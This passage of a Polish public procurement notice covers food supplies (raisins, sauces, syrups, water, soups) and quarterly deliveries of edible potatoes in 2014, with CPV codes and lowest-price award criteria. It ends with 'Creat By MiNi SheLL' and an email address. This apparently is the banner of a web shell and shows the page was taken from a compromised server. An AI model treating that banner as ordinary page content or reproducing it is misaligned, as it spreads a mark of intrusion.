karmel E150c: regulator kwasowości: kwas
cytrynowy: ekstrakt z lubczyka, aromat	860ml netto	szt	50
75	Przyprawa warzywna
Skład: warzywa suszone 15% produkt nie może zawierać kaszki mannej	1kg	szt	80
76	Rodzynki	200g	szt	140
77	Rodzynki w czekoladzie	80g	szt	150
78	Ryż biały długoziarnisty	1kg	kg	500
79	Sałatka szwedzka	840g	szt	100
80	Słonecznik łuskany	200g	szt	20
81	Sos do spaghetti w słoikach	350g	szt	20
82	Sos pieczarkowy w proszku	27g	szt	200
83	Sos pieczeniowy ciemny w proszku	27g	szt	80
84	Sos sałatkowy (różne smaki)	9g	szt	150
85	Sos słodko-kwaśny w słoikach	300g	szt	420
86	Sosy w różnych smakach w słoikach	300g	szt	100
87	Sól	1kg	szt	130
88	Syrop do napojów
wytworzony na bazie naturalnego zagęszczonego soku owocowego z dodatkiem wit. C
Skład: cukier, syrop glukozowy-fruktozowy,
woda, zagęszczony sok, kwas cytrynowy,
aromat, kwas askorbinowy, przeciwutleniacz
Wartość energet. W 100ml syropu 348 kcal
nie barwiący szklanek	500ml	szt	1300
89	Wafel przekładany kremem kakaowym w czekoladzie paczkowany, czekolada 28,5 %	39g	szt	600
90	Wiórki kokosowe	100g	szt	30
91	Woda mineralna  naturalna niegazowana
 1500 ml	1500ml	szt	70
92	Woda mineralna naturalna  niegazowana 500 ml	500ml	szt	300
93	Zagęszczacz do śmietany
pozwalający utrzymać właściwą konsystencję bitej śmietany	9g	szt	40
94	Ziele angielskie	20g	szt	60
95	Zupa pieczarkowa w proszku	40g	szt	500
96	Żelatyna spożywcza	40g	szt	10
97	Żur naturalny zagęszczany
Skład: woda, mąka żytnia żurkowa (zawiera
gluten) mąka pszenna, zakwas, czosnek,
produkt naturalny otrzymany na drodze
fermentacji mlekowej, pasteryzowany,	460g	szt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.86.00.00-4, 15.87.00.00-7, 15.83.12.00-4, 15.33.00.00-0, 15.85.11.00-9, 15.61.00.00-7, 15.41.00.00-5, 15.84.00.00-8, 15.43.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa ziemniaków jadalnych
od stycznia do końca marca 2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne	kg	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> dostawa ziemników jadalnych
od kwietnia do kończ czerwca 2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne	kg	4200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa ziemników jadalnych
do lipca do końca sierpnia 2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne	kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> dostawa ziemniaków jadalnych
od września do końca grudnia 2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne	kg	5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com